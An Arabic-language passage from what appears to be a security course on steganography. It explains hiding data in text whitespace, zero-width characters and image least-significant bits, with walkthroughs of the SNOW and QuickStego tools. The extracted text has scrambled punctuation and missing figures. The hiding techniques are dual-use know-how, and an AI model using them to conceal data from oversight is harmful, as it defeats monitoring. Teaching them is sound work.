اﻟﺣروف اﻟﻐﺎﻣﻖ ،اﻟﻣﺳطر ،واﻟﻣﺎﺋل ،اﻟﺗﺷﻛﯾل ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﺣروف اﻟﻌرﺑﯾﺔ( ،ﯾﻣﻛن ان ﺗﺿﯾف ﻣﻌﻠوﻣﺎت ﺧﻔﯾﺔ ﻓﻲ ﻣﺗن اﻟﻧص ،ﺑدون ان ﺗﺑدو
واﺿﺣﺔ ﺑﺻرﯾﺎ ﻋﻧد ﻋرﺿﮭﺎ ،وﻟﻛن ﯾﻣﻛن اﻛﺗﺷﺎﻓﮭﺎ ﻋﻧد اﻻطﻼع ﻋﻠﻰ ﺷﻔرة ﻣﺻدر اﻟوﺛﯾﻘﺔ.
ﯾﻣﻛن ان ﺗﺣﺗوي ﺻﻔﺣﺎت ) ،(HTMLﻋﻠﻰ ﺗﻌﻠﯾﻣﺎت ﺑرﻣﺟﯾﺔ ذات ﻣﺳﺎﻓﺎت ﻓﺎرﻏﺔ ) (blank spacesإﺿﺎﻓﯾﺔ وﻋﻼﻣﺎت اﻟﺗﺑوﯾب ﻓﻲ ﻧﮭﺎﯾﺔ
اﻷﺳطر ،وﻛذﻟك أﻟوان ﻣﺧﺗﻠﻔﺔ ،واﻟﺧطوط واﻷﺣﺟﺎم ،واﻟﺗﻲ ﻟن ﺗﻛون ﻣرﺋﯾﺔ ﻋﻧد ﻋرﺿﮭﺎ .وھﻧﺎك ﻣﺛﺎل أﻛﺛر ﺑﺳﺎطﺔ ھو ﻧص أﺑﯾض ﻋﻠﻰ ﺧﻠﻔﯾﺔ
ﺑﯾﺿﺎء ،واﻟﺗﻲ ﯾﻣﻛن أن ﯾﻛﺷف ﻋﻧد ﺑﺗﺣدﯾده"selecting”.
أﺣد ھذه اﻷﺳﺎﻟﯾب ﯾﺳﺗﻧد إﻟﻰ اﺳﺗﺧدام ﺣروف ﯾوﻧﯾﻛود اﻟﻐﯾر ﻗﺎﺑﻠﮫ ﻟﻠطﺑﺎﻋﯾﺔ)، ((ZWJ)zero-width-joiner)، (non-printing
) .(ZWNJ) (zero-width non-joinerوﺗﺳﺗﺧدم ھذه اﻷﺣرف ﻟوﺻل وﻓﺻل اﻟﺣروف ﻓﻲ اﻟﻠﻐﺔ اﻟﻌرﺑﯾﺔ ،وﻟﻛن ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻓﻲ
اﻟﺣروف اﻟﮭﺟﺎﺋﯾﺔ اﻟروﻣﺎﻧﯾﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻷﻧﮭﺎ ﻻ ﻣﻌﻧﻰ ﻟﮭﺎ ﻓﻲ اﻷﺑﺟدﯾﺔ اﻟﻼﺗﯾﻧﯾﺔ ،وﺑﺎﻟﺗﺎﻟﻲ ﻻ ﯾﺗم ﻋرﺿﮭﺎ.
-6اﺳﺗﺧدام أﻟﻐﺎز ﺳودوﻛو
ﻓن إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﻓﻲ ﺻورة ﺑﺎﺳﺗﺧدام أﻟﻐﺎز ﺳودوﻛو ،”Sudoku puzzle"،واﻟذي ﯾﺳﺗﺧدم ﻛﻣﻔﺗﺎح ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت داﺧل ﺻورة .إﺧﻔﺎء
اﻟﻣﻌﻠوﻣﺎت ﺑﺎﺳﺗﺧدام اﻷﻟﻐﺎز ﺳودوﻛو ﯾﻣﺗﻠك اﻟﻌدﯾد ﻣن اﻟﻣﻔﺎﺗﯾﺢ ﺑﻘدر اﻟﺣﻠول اﻟﻣﻣﻛﻧﺔ ﻟﻠﻐز ﺳودوﻛو ،واﻟذي ھو .1021 × 6.71وھذا ﯾﻌﺎدل
ﺣواﻟﻲ 70ﺑت ،ﻣﻣﺎ ﯾﺟﻌﻠﮭﺎ أﻗوى ﺑﻛﺛﯾر ﻣن طرﯾﻘﺔ DESاﻟذي ﯾﺳﺗﺧدم ﻣﻔﺗﺎح 56ﺑت.
ﺗﺷﻔﯾر Steganographyﯾﺳﺗﺧدم اﻷﻣﺎﻛن اﻷﻗل أھﻣﯾﺔ ﻣن اﻟﻣﺣﺗوى اﻟرﻗﻣﻲ ،وﯾﻘﺣم اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ ﻓﻲ ﻣﻛﺎﻧﮭﺎ .ﯾﺗم ذﻟك ﻋﺑر ﻣﻠﻔﺎت اﻟﺻور
واﻟﻣﻠﻔﺎت اﻟﻧﺻﯾﺔ واﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ وأي ﺑﯾﺎﻧﺎت رﻗﻣﯾﺔ .اﻟﻘﺻد ﻣن ھذه اﻟﻌﻣﻠﯾﺔ ھو ﺗوﻓﯾر اﻟﺳرﯾﺔ .ﻣﻊ ﺗﻘدم ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ،اﻟرﺳﺎﺋل اﻟﻣﺧﻔﯾﺔ
داﺧل اﻟﺻور اﻟرﻗﻣﯾﺔ أﺻﺑﺣت اﻟﻧﻣوذج اﻷﻛﺛر ﺷﯾوﻋﺎ ً واﻟﻔﻌﺎل ﻟﻠﻐﺎﯾﺔ ﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت .ﯾﺗم ﺗﺧزﯾن اﻟﺻور ﻓﻲ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻛﻣﺟﻣوﻋﺔ
ﻣن وﺣدات اﻟﺑﻛﺳل ،ﺑﻣﻘدار ﺑﻛﺳل واﺣد ﺑﻧﺣو ﻣن 8إﻟﻰ 24ﺑت .ﯾﺗم ﺗﺧزﯾن ھذه اﻟﻣﺟﻣوﻋﺔ ﻣن اﻟﺑﻛﺳل ﻓﻲ ﻣﻠف ﺻورة وﻓﻘﺎ ﻷي واﺣد ﻣن
ﻋدد ﻣن اﻷﺷﻛﺎل .ھﻧﺎك اﺛﻧﯾن ﻣن اﻟﻣﻠﻔﺎت اﻟذي ﺳوف ﻧﺣﺗﺎﺟﮭم ﻓﻲ إﺧﻔﺎء رﺳﺎﻟﺔ داﺧل ﻣﻠف اﻟﺻورة.
ھذﯾن اﻟﻣﻠﻔﯾن ھﻣﺎ:
.1اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﺻورة اﻟﺗﻲ ﻣن اﻟﻣﻔﺗرض أن ﺗوﺿﻊ اﻟرﺳﺎﻟﺔ ﻓﯾﮫ.
.2اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟرﺳﺎﻟﺔ ﻧﻔﺳﮭﺎ.
Types of Steganography
Steganographyھو ﻓن وﻋﻠم ﻛﺗﺎﺑﺔ اﻟرﺳﺎﺋل اﻟﻣﺧﻔﯾﺔ ﻓﻲ ﻣﺛل ھذه اﻟطرﯾﻘﺔ ﻻ أﺣد ﻏﯾر اﻟﻣﺗﻠﻘﻲ ﯾﻌرف ﻣن وﺟود اﻟرﺳﺎﻟﺔ .ﻣﻊ زﯾﺎدة
اﻻﺳﺗﺧداﻣﺎت اﻟﻣﺗزاﯾدة ﻟﺻﯾﻎ اﻟﻣﻠﻔﺎت اﻻﻟﻛﺗروﻧﯾﺔ ﻣﻊ اﻟﺗﻛﻧوﻟوﺟﯾﺎت اﻟﺟدﯾدة أﺻﺑﺢ ﻣن اﻟﻣﻣﻛن إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت .إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻷﺳﺎﺳﯾﺔ ﯾﻣﻛن
ﺗﻘﺳﯾﻣﮭﺎ إﻟﻰ ﻣﺟﺎﻟﯾن :إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ) (data hidingوأﻧﺷﺎء اﻟوﺛﺎﺋﻖ ) .(document makingأﻧﺷﺎء اﻟوﺛﺎﺋﻖ )(document making
ﯾﺗﻌﺎﻣل ﻣﻊ اﻟﺣﻣﺎﯾﺔ ﺿد اﻹزاﻟﺔ/اﻟﻣﺳﺢ .وﺗﻧﻘﺳم ھﻲ اﻷﺧرى اﻟﻰ اﻟﻌﻼﻣﺎت اﻟﻣﺎﺋﯾﺔ ) (watermarkingواﻟﺑﺻﻣﺎت ). (Fingerprinting
ﯾﺗم ﺳرد أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن Steganographyﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ:
واﺳﺗﻧﺎدا إﻟﻰ اﻟﻣﻧﺎﻗﺷﺔ اﻟواردة أﻋﻼه ﻓﻣن اﻟﻣﻣﻛن ﺗﻌرﯾف ﺟدول ﺗﺻﻧﯾف ﻣﺧططﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﻣﻔﺗﺎﺣﯾﺔ:
ﺑرﻧﺎﻣﺞ SNOWﯾﺳﺗﺧدم ﻹﺧﻔﺎء اﻟرﺳﺎﺋل ﻓﻲ ﻧص ASCIIﻣن ﺧﻼل ﺗﺿﻣﯾن اﻟﻣﺳﺎﻓﺎت اﻟﺑﯾﺿﺎء ﻓﻲ ﻧﮭﺎﯾﺔ اﻷﺳطر .ﻷن اﻟﻣﺳﺎﻓﺎت وال
TABﻋﻣوﻣﺎ ﻏﯾر ﻣرﺋﯾﺔ ﺑﺎﻟﻧﺳﺑﺔ ل ، text viewerاﻟرﺳﺎﻟﺔ ﻓﻌﻠﯾﺎ ً ﺗﻛون ﻣﺧﻔﯾﮫ ﻋن اﻟﻣراﻗﺑﯾن اﻟﻌﺎدﯾﯾن .إذا ﺗم اﺳﺗﺧدام اﻟﺗﺷﻔﯾر ﻓﻲ اﻟﺑﻧﺎء ،ﻓﺎﻧﮫ
ﻻ ﯾﻣﻛن ﻗراءة اﻟرﺳﺎﻟﺔ ﺣﺗﻰ وﻟو ﺗم اﻛﺗﺷﺎﻓﮭﺎ.
ﻟﻧﻔﻌل ذﻟك ﻧﻘوم ﺑﻔﺗﺢ ﺳطر اﻷواﻣر اﻟﺧﺎص ﺑﺎﻟوﯾﻧدوز ) (cmdﺛم اﻻﻧﺗﻘﺎل اﻟﻰ اﻟﻣﺟﻠد اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﺗطﺑﯾﻖ .snow -
ﻧﻘوم ﺑﻛﺗﺎﺑﺔ رﺳﺎﻟﺔ ﻣﺎ وﻧﻛﺗب ﺑﮭﺎ ﻣﺛﻼ Hello worldﺛم ﻧﻘوم ﺑﺣﻔظﮭﺎ ﺑﺎﺳم readme.txtﻛﺎﻻﺗﻰ: -
ھﻧﺎ ﺣﯾث ﻗﻣﻧﺎ ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ واﻟﺗﻲ ھﯾﺎ My swiss bank account number is 45656684512263ﻓﻲ ﻣﻠف اﻟﻧﺻﻲ -
readme.txtﺛم ﻗﻣﻧﺎ ﺑﺈﻧﺷﺎء ﻣﻠف ﺟدﯾد readme2.txtواﻟذي ﯾﺣﺗوي ھذا اﻟﻣﻠف ﻋﻠﻰ اﻟﻣﺣﺗوى اﻟﻣوﺟود ﺑداﺧل اﻟﻣﻠف
readme.txtﺑﺎﻹﺿﺎﻓﺔ اﻟﻰ اﻟرﺳﺎﻟﺔ اﻟﻣﺷﻔرة واﺳﺗﺧداﻣﻧﺎ أﯾﺿﺎ رﻗم ﺳرى واﻟذي ﻣن ﺣﻼﻟﮫ ﯾﺗﯾﺢ اﻻطﻼع ﻋﻠﻰ اﻟرﺳﺎﻟﺔ.
ﻟرؤﯾﺔ ﻣﺣﺗوى اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﺎة ﻣرة أﺧرى ﻧﺳﺗﺧدم اﻻﺗﻲ: -
Snow –C –p “magic” readme2.txt
ﻟﻔﺣص اﻟﻣﻠف ﻓﻲ GUIﻧﻘوم ﺑﻔﺗﺢ اﻟﻣﻠف readme2.txtﺑﺎﻟﻣﺣرر notepadﺛم ﻧﺧﺗﺎر Edit Select allﺣﯾث ﻧرى -
اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻋﻠﻰ ھﯾﺋﺔ ﻣﺳﺎﻓﺎت و .TABS
Image Steganography
ﻣﻘﺪﻣﮫ
Image steganographyﯾﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك داﺧل ﺻورة .ﺣﯾث ﯾﻣﻛﻧك اﻻﺳﺗﻔﺎدة ﻣن اﻟﺑت اﻟزاﺋدة ﻋن اﻟﺣﺎﺟﺔ
ﻟﻠﺻورة ﻹﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﺑداﺧﻠﮭﺎ .اﻟﺑﺗﺎت bitsاﻟزاﺋدة ﺗﻠك اﻟﺗﻲ ﻓﻲ اﻟﺻورة ﻟﮭﺎ ﺗﺄﺛﯾر ﺿﺋﯾل ﺟدا ً ﻋﻠﻰ اﻟﺻورة إذا ﺣدث ﺗﻐﯾر ﻟﮭﺎ .اﻟﺗﻌدﯾﻼت
ﻋﻠﻰ اﻟﺑﺗﺎت ﻻ ﯾﺗم اﻟﻛﺷف ﻋﻧﮭﺎ ﺑﺳﮭوﻟﮫ .ﯾﻣﻛﻧك إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑك داﺧل اﻟﺻور ﻓﻲ ﺗﻧﺳﯾﻘﺎت ﻣﺧﺗﻠﻔﺔ ﻣﺛل PNGو JPGوBMP
وﻏﯾرھﺎ ﻣن ﺗﻧﺳﯾﻘﺎت اﻟﺻور اﻷﺧرى.
اﻟﺻور ﺗﻌﺗﺑر ﻣن أﻛﺛر اﻷدوات ﺷﻌﺑﯾﮫ اﻟﻣﺳﺗﺧدﻣﺔ ﻛﻐطﺎء ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧﻠﮭﺎ .اﻷدوات اﻟﻣﺳﺗﺧدﻣﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور
ﺗﺳﺗﺧدم اﻟﺑت اﻟزاﺋدة ﻋن اﻟﺣﺎﺟﺔ ﻣن ﺑﯾﺎﻧﺎت اﻟﺻورة ﻟﺗﺣل ﻣﺣﻠﮭﺎ اﻟرﺳﺎﻟﺔ اﻟﻣراد إﺧﻔﺎﺋﮭﺎ ﺑطرﯾﻘﺔ ﺑﺣﯾث ﯾﻛون ﺗﺄﺛﯾرھﺎ ﻻ ﯾﻣﻛن ﻛﺷﻔﮫ ﺑﺎﻟﻌﯾن
اﻟﺑﺷرﯾﺔ.
ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اداﺧل ﻟﺻورة ) (Image Steganography Techniqueﯾﻣﻛن ﺗﻘﺳﯾﻣﮭﺎ إﻟﻰ ﻣﺟﻣوﻋﺗﯾنImage domain :
و.transform domain
-ﻓﻲ ﺗﻘﻧﯾﺔ ،Image (spatial) domainاﻟرﺳﺎﻟﺔ ﯾﺗم ﺗﺿﻣﯾﻧﮭﺎ ﻣﺑﺎﺷرة ﻓﻲ ﻛﺛﺎﻓﺔ ﺑﻛﺳل). (intensity of the pixels
-ﻓﻲ ﺗﻘﻧﯾﺎت ) ،transform domain (frequencyﯾﺗم ﺗﺣوﯾل اﻟﺻور أوﻻً ﺛم ﯾﺗم ﺗﺿﻣﯾن اﻟرﺳﺎﻟﺔ ﻓﻲ اﻟﺻورة.
ھﻧﺎك ﺛﻼﺛﺔ أﺳﺎﻟﯾب اﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻓﻲ ﻣﻠﻔﺎت اﻟﺻور :
-اﻟﺗﺿﻣﯾن ﺑدﻻ ﻣن اﻟﺑﺗﺎت اﻟﻣﮭﻣﻠﺔ ).(Least Significant Bit Insertion
-اﻟﺗﻘﻧﻊ واﻟﻔﻠﺗرة ).(Masking and Filtering
-اﻟﺧوارزﻣﯾﺎت واﻟﺗﺣول ).(Algorithms and Transformation
The Least Significant Bit Insertion techniqueھو ﻣن أﻛﺛر اﻟﺗﻘﻧﯾﺎت اﻟﻣﺳﺗﺧدﻣﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑداﺧل اﻟﺻور وذﻟك ﻣن
ﺧﻼل اﺳﺗﺧدام اﻗل ﺑﯾت ﻣﮭﻣل ]) [Least Significant Bit (LSBﻟﻛل ﺑﻛﺳل ﻟﻼﺣﺗﻔﺎظ ﺑﺎﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك LSB .ھو اﻟﺑت
اﻟﻣوﺟود ﻓﻲ أﻗﺻﻰ اﻟﯾﻣﯾن ﻣن ﻛل ﺑﻛﺳل ﻣن ﻣﻠف اﻟﺻورة LSB .ھذا ،إذا ﺗﻐﯾرت ،ﻟﮫ ﺗﺄﺛﯾر ﺿﺋﯾل ﺟدا ً ﻋﻠﻰ اﻟﺻورة؛ ﻻ ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ.
ﻹﺧﻔﺎء اﻟرﺳﺎﻟﺔ ،ﯾﺟب أوﻻً ﻛﺳر اﻟرﺳﺎﻟﺔ وإدراج ﻛل ﺑت ﻣﻛﺎن LSBﻟﻛل ﺑﻛﺳل ﻣن اﻟﺻورة ﺑﺣﯾث ﯾﻣﻛن ﻟﻠﻣﺗﻠﻘﻲ ﻓﻲ اﻟﻧﮭﺎﯾﺔ اﺳﺗرداد اﻟرﺳﺎﻟﺔ
اﻟﺧﺎﺻﺔ ﺑك ﺑﻛل ﺳﮭوﻟﺔ.
ﻧﻔﺗرض أﻧك ﻗد اﺧﺗرت ﺻورة 24ﺑت ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ،واﻟﺗﻲ ﯾﻣﻛن ان ﺗﻛون ﻣﻣﺛﻠﺔ ﻓﻲ ﺷﻛل رﻗﻣﻲ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ:
)(00100111 11101001 11001000) (00100111 11001000 11101001) (11001000 00100111 11101001
وﺗرﯾد إﺧﻔﺎء ﺣرف " "Hﻓﻲ اﻟﺻورة أﻋﻼه 24ﺑت ﻛﻣﺎ ﯾﻠﻲ.
اﻵن ﺣرف " "Hﯾﻣﺛﻠﮫ اﻷرﻗﺎم اﻟﺛﻧﺎﺋﯾﺔ 01001000ﻹﺧﻔﺎء ھذا " ،"Hﯾﻣﻛﻧك ﺗﻐﯾر اﻟﺗﯾﺎر اﻟﺳﺎﺑﻖ إﻟﻰ اﻻﺗﻲ:
ﺣﯾث إﻧك ﻓﻘط ﺳوف ﺗﺣﺗﺎج اﻟﻰ اﺳﺗﺑدال LSBﻣن ﻛل ﺑﻛﺳل ﻣن ﻣﻠف اﻟﺻورة ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ ھذا اﻟﺷﻛل.
ﻻﺳﺗرداد ھذا Hﻓﻲ اﻟﺟﺎﻧب اﻵﺧر ،ﻓﺈن اﻟﺷﺧص ﻓﻲ اﻟﺟﺎﻧب اﻟﻣﺗﻠﻘﻲ ﯾﻘوم ﺑﺗﺟﻣﯾﻊ ﻛل LSBﺑت ﻣن ﻣﻠف اﻟﺻورة وﺑﺎﻟﺗﺎﻟﻲ ﻓﮭو ﻗﺎدر ﻋﻠﻰ
اﻟﻛﺷف ﻋن Hﻓﻲ اﻟﺟﺎﻧب اﻟﻣﺗﻠﻘﻲ.
Masking and Filtering -2
Masking and filtering techniquesﺗﺳﺗﻔﯾد ﻣن اﻟﻘدرات اﻟﺑﺻرﯾﺔ ﻟﻺﻧﺳﺎن اﻟﺗﻲ ﻻ ﯾﻣﻛﻧﮭﺎ اﻟﻛﺷف ﻋن اﻟﺗﻐﯾﯾرات اﻟطﻔﯾﻔﺔ ﻓﻲ ﺻوره
ﻣﻌﯾﻧﺔ .ﯾﻣﻛن ﻟﻠﺻور اﻟرﻣﺎدﯾﺔ ) (Grayscale imagesإﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑطرﯾﻘﺔ ﻣﺷﺎﺑﮭﺔ ﻟﻠﻌﻼﻣﺎت اﻟﻣﺎﺋﯾﺔ ﻋﻠﻰ اﻟورق ،وﺗﺳﺗﺧدم ﻓﻲ ﺑﻌض
اﻷﺣﯾﺎن ﻛﺄﻧﮭﺎ ﻋﻼﻣﺎت ﻣﺎﺋﯾﺔ رﻗﻣﯾﺔ.
The masking techniqueﯾﺳﻣﺢ ﻟك ﺑﺈﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻋن طرﯾﻖ وﺿﻌﮭﺎ ﻓﻲ ﻣﻠف اﻟﺻور .ﻛل ﻣن ﺗﻘﻧﯾﺎت
) Maskingاﻟﺗﻘﻧﻊ( و filteringﺗﺳﺗﺧدم ﻓﻲ اﻟﻐﺎﻟب ﻓﻲ -24ﺑت-ﻟﻛل-ﺑﻛﺳل ﻓﻲ اﻟﺻور واﻟﺻور اﻟرﻣﺎدﯾﺔ .ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ،ﻓﺎﻧت
ﺑﺣﺎﺟﺔ اﻟﻰ ﺿﺑط اﻹﺿﺎءة واﻟﺗﻌﺗﯾم ﻟﻠﺻورة .إذا ﻛﺎن اﻟﺗﻐﯾﯾر ﻓﻲ اﻹﻧﺎرة ﺻﻐﯾر ،ﻓﺎن اﻟﻣﺳﺗﺧدﻣﯾن ﻋدا اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺳﺗﮭدﻓﯾن ﻻ ﯾﻼﺣظون أن
اﻟﺻورة ﺗﺣﺗوي ﻋﻠﻰ رﺳﺎﻟﺔ ﺧﻔﯾﺔ .ھذا اﻷﺳﻠوب ﯾﻣﻛن ﺑﺳﮭوﻟﺔ ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ اﻟﺻورة ﻛﻣﺎ أﻧﮭﺎ ﻻ ﺗﺧل ﺑﺎﻟﺻورة .ﺗﺳﺗﺧدم ﻓﻲ اﻟﻐﺎﻟب ﻣﻊ ﺻور
) Lossy JPEG .JPEGاﻟﺟزء اﻟﻣﮭﻣل ﻓﻲ اﻟﺻورة( ﺗﻛون ﻣﺣﺻﻧﺔ ﻧﺳﺑﯾﺎ ﻣن ﻋﻣﻠﯾﺎت اﻟزرع واﻟﺿﻐط ﻋﻠﻰ اﻟﺻور .وﺑﺎﻟﺗﺎﻟﻲ ،ﻓﺎن إﺧﻔﺎء
اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﺟزء Lossy jpegﯾﺗم ﻏﺎﻟﺑﺎ ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺔ اﻟﺗﻘﻧﻊ ) .(Masking techniqueاﻟﺳﺑب ﻓﻲ ذﻟك ان Steganography Image
ﯾﻘوم ﺑﺎﻟﺗﺷﻔﯾر ﺑواﺳطﺔ وﺿﻊ ﻋﻼﻣﺎت ﻓﻲ ﻣﻌدل ﻣﻧﺧﻔض ﻋﻧد ﺿﻐط JPEGواﻟذي ﺗﻛون ﻓﯾﮫ اﻟرﺳﺎﻟﺔ ﻣﺧﺑﺄه ﻓﻲ ﻣﻧطﻘﮫ ﺧﺎﺻﮫ ﻣن اﻟﺻورة.
اﻟﻣﺻدرhttp://quickcrypto.com :
Quickstegoﯾﺗﯾﺢ ﻟك اﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻓﻲ اﻟﺻور ﺑﺣﯾث ﯾﻣﻛن ﻓﻘط ﻟﻣﺳﺗﺧدﻣﻲ Quickstegoﻣن اﺳﺗرداد وﻗراءة اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ
اﻟﻣﺧﻔﯾﺔ .ﺑﻣﺟرد إﺧﻔﺎء اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻓﻲ اﻟﺻورة ،ﻻ ﯾزال ﺑﺈﻣﻛﺎﻧك ﺣﻔظﮫ ﻛﻣﻠف اﻟﺻورة؛ ﻓﺈﻧﮫ ﺳﯾﺗم ﺗﺣﻣﯾل ﺗﻣﺎﻣﺎ ﻣﺛل أي ﺻورة أﺧرى،
وﯾﺑدو ﻛﻣﺎ ﻓﻌﻠت ﻣن ﻗﺑل .ﯾﻣﻛن ﺣﻔظ اﻟﺻورة ،ﻋﺑر اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ ،وﺗﺣﻣﯾﻠﮭﺎ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻛﻣﺎ ﻛﺎن ﻣن ﻗﺑل ،واﻟﻔرق اﻟوﺣﯾد
ﺳﯾﻛون أﻧﮫ ﯾﺣﺗوي ﻋﻠﻰ رﺳﺎﻟﺔ ﺧﻔﯾﺔ.
Quickstegoﯾﻐﯾر ﺑﺻورة ﺗدرﯾﺟﯾﺔ ﺑﻛﺳل )ﻋﻧﺎﺻر اﻟﺻورة اﻟﻔردﯾﺔ( ﻣن اﻟﺻورة ،ﺗﺷﻔﯾر اﻟﻧص اﻟﺳري ﺑﺈﺿﺎﻓﺔ اﺧﺗﻼﻓﺎت ﺻﻐﯾرة ﻓﻲ ﻟون
اﻟﺻورة .ﻓﻲ اﻟﻣﻣﺎرﺳﺔ اﻟﻌﻣﻠﯾﺔ ،ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻌﯾن اﻟﺑﺷرﯾﺔ ،ﻻ ﺗظﮭر ھذه اﻟﺧﻼﻓﺎت اﻟﺻﻐﯾرة ﻟﺗﻐﯾﯾر اﻟﺻورة.
طرﯾﻘﺔ اﻟﻌﻣل:
-ﻧﻘوم ﺑﺎﻟﺗﺛﺑﯾت ﻣن ﺧﻼل اﺗﺑﺎع Wizardﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﺑرﻧﺎﻣﺞ ﻣن ﺧﻼل اﻟﻧﻘر اﻟﻣزدوج ﻓوﻗﮫ واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور اﻻﺗﻲ:
ﻧﺟد اﻧﮫ ﯾﺣﺗوي ﻋﻠﻰ ﻣﺟﻣوع ﻣن اﻷدوات ﻧﻘوم أوﻻ ﺑﺎﻟﻧﻘر ﻓوق Open Imageﻟﻧﻘوم ﻣن ﺧﻼل اﺧﺗﯾﺎر اﻟﺻورة اﻟﺗﻲ ﺳوف -
ﻧﺳﺗﺧدﻣﮭﺎ ﻛﻐطﺎء ﻹﺧﻔﺎء اﻟﻧص اﻟﺳري.
ﻧﻼﺣظ ﺑﻌد اﺧﺗﯾﺎر اﻟﺻورة ،إذا ﻛﺎﻧت اﻟﺻورة ﺧﺎﻟﯾﮫ ﻣن أي ﻧص ﻣﺷﻔر ﺑواﺳطﺔ ھذا اﻟﺗطﺑﯾﻖ ﻓﮭذا ﺳوف ﯾؤدى اﻟﻰ ظﮭور اﻟرﺳﺎﻟﺔ -
اﻟﺗﺎﻟﯾﺔ ﻓﻲ أﺳﻔل ادوات اﺧﺗﯾﺎر اﻟﺻورة:
THIS IMAGE DOES NOT HAVE A QUICK STEGO SECRET TEXT MESSAGE.
ﺑﻌد اﺧﺗﯾﺎر اﻟﺻورة ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق Open Textﻻﺧﺗﯾﺎر اﻟﻧص اﻟذي ﻧرﯾد اﺧﻔﺎءه. -
اﻻن وﻗد اﺧﺗرﻧﺎ اﻟﺻور وأﯾﺿﺎ اﻟﻧص اﻟذي ﻧرﯾد اﺧﻔﺎﺋﮫ ،ﻧﻘوم اﻻن ﺑﺎﻟﻧﻘر ﻓوق Hide Textواﻟذي ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﻧص ﺑداﺧل -
اﻟﺻورة.
ﻧﻼﺣظ أﯾﺿﺎ ﺑﺟﺎﻧب اﻟزر Hide Textوﺟود زر اﺧر وھو Get Textواﻟذي ﯾﻘوم ﺑﺄداء اﻟﻌﻛس ﺣﯾث ﯾﻘوم ﺑﺎﻟﺣﺻول ﻋﻠﻰ اﻟﻧص -
اﻟﻣﺧﻔﻲ ﻣن اﻟﺻورة.
ﺑﻌد إﺗﻣﺎم إﺧﻔﺎء اﻟﻧص ﻓﻲ اﻟﺻورة ﺗظﮭر اﻟرﺳﺎﻟﺔ ) (The text message is now hidden in imageواﻟﺗﻲ ﺗﺧﺑرك ﺑﺈﻧﮭﺎء -
ﻋﻣﻠﯾﺔ اﻻﺧﻔﺎء.
اﻻن اﻟﻰ اﻟﺧطوة اﻷﺧﯾرة وﻓﯾﮭﺎ ﻧﻘوم ﺑﺣﻔظ اﻟﺻورة اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ اﻟﻧص اﻟﻣﺷﻔر وذﻟك ﺑﺎﻟﻧﻘر ﻓوق .Save Image -
Steg -2
اﻟﻣﺻدرhttps://steg.drupalgardens.com/stegdownload :
